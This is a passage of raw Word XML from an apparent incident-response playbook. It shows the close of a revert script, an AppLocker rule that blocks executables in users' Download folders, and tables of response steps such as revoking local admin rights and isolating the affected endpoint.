          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SilentlyContinue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="40D905F7" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="60C6BC5B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t># Done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4334D0EA" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Write-Host "[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>] System has been reverted to pre-setup state." -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ForegroundColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Green</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4F046E4F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="65B04B51" w14:textId="000F9709">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890129" w:id="13"/>
      <w:r>
        <w:t>3.5.4 Block Executables from the Download Folder</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="1D93E217" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="38FF9A3C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Only available on Windows 10 Enterprise and Windows 10 Education</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="40CCC6F0" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="0AF8C88C" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Just as an example for further steps. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="053250CB" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="76523C7B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To not break legitimate .exe execution. Here is an example how to block executables from the Download Folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4BE7387D" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="006EEC5B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>$rule = New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AppLockerFileRule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>RuleType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Path -User Everyone -Action Deny -Path "C:\Users\*\Downloads\*.exe" -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>RuleName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>BlockDownloadsEXE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="3A6E0379" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>$policy = New-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AppLockerPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>RuleObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> $rule</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="29881D70" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AppLockerPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PolicyObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A44022">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> $policy -Merge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="65DE26E1" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="3F12BFA6" w14:textId="6568F8E7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Additional Steps:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="80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540"/>
        <w:gridCol w:w="4555"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidTr="00B20A5F" w14:paraId="27FF30CA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="4D4F20AA" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="6FA50008" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why It Helps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidTr="00B20A5F" w14:paraId="07ED64DD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="03FF6EDB" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve">Block Executable </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="794C873F" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Prevent future execution of the artifact (e.g., hash, path, signature)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidTr="00B20A5F" w14:paraId="5194EB15" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="39433832" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Revoke Local Admin Rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="62CF9BB2" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Removes lateral movement / privilege escalation capability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidTr="00B20A5F" w14:paraId="700F6984" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="590B624A" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Move to Domain-Based Administration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="24C68CAC" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A44022">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Prevents use of persistent local accounts; improves auditability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="74FA14DF" w14:textId="77777777">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5EFF4C31" w14:textId="2E024E8A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc193890130" w:id="14"/>
      <w:r>
        <w:t>3.6 Additional Technical Response</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidRPr="00A44022" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="5AC774D8" w14:textId="77777777"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="80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540"/>
        <w:gridCol w:w="4555"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="1CC6106C" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="340"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00445989" w:rsidRDefault="00A44022" w14:paraId="61336960" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Step</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00445989" w:rsidRDefault="00A44022" w14:paraId="0C5E67F0" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Why It Helps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="133889CE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="680"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00445989" w:rsidRDefault="00A44022" w14:paraId="7570B57B" w14:textId="77777777">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Isolate Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4555" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidP="00A44022" w:rsidRDefault="00A44022" w14:paraId="7FEF1D00" w14:textId="77777777">
            <w:pPr>
              <w:ind w:left="360" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE46A0">
              <w:rPr>
                <w:rFonts w:ascii="Aptos Narrow" w:hAnsi="Aptos Narrow" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>If possible, quarantine the affected machine from the network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="00AE46A0" w:rsidR="00A44022" w:rsidTr="00A44022" w14:paraId="6FFD7520" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3540" w:type="dxa"/>
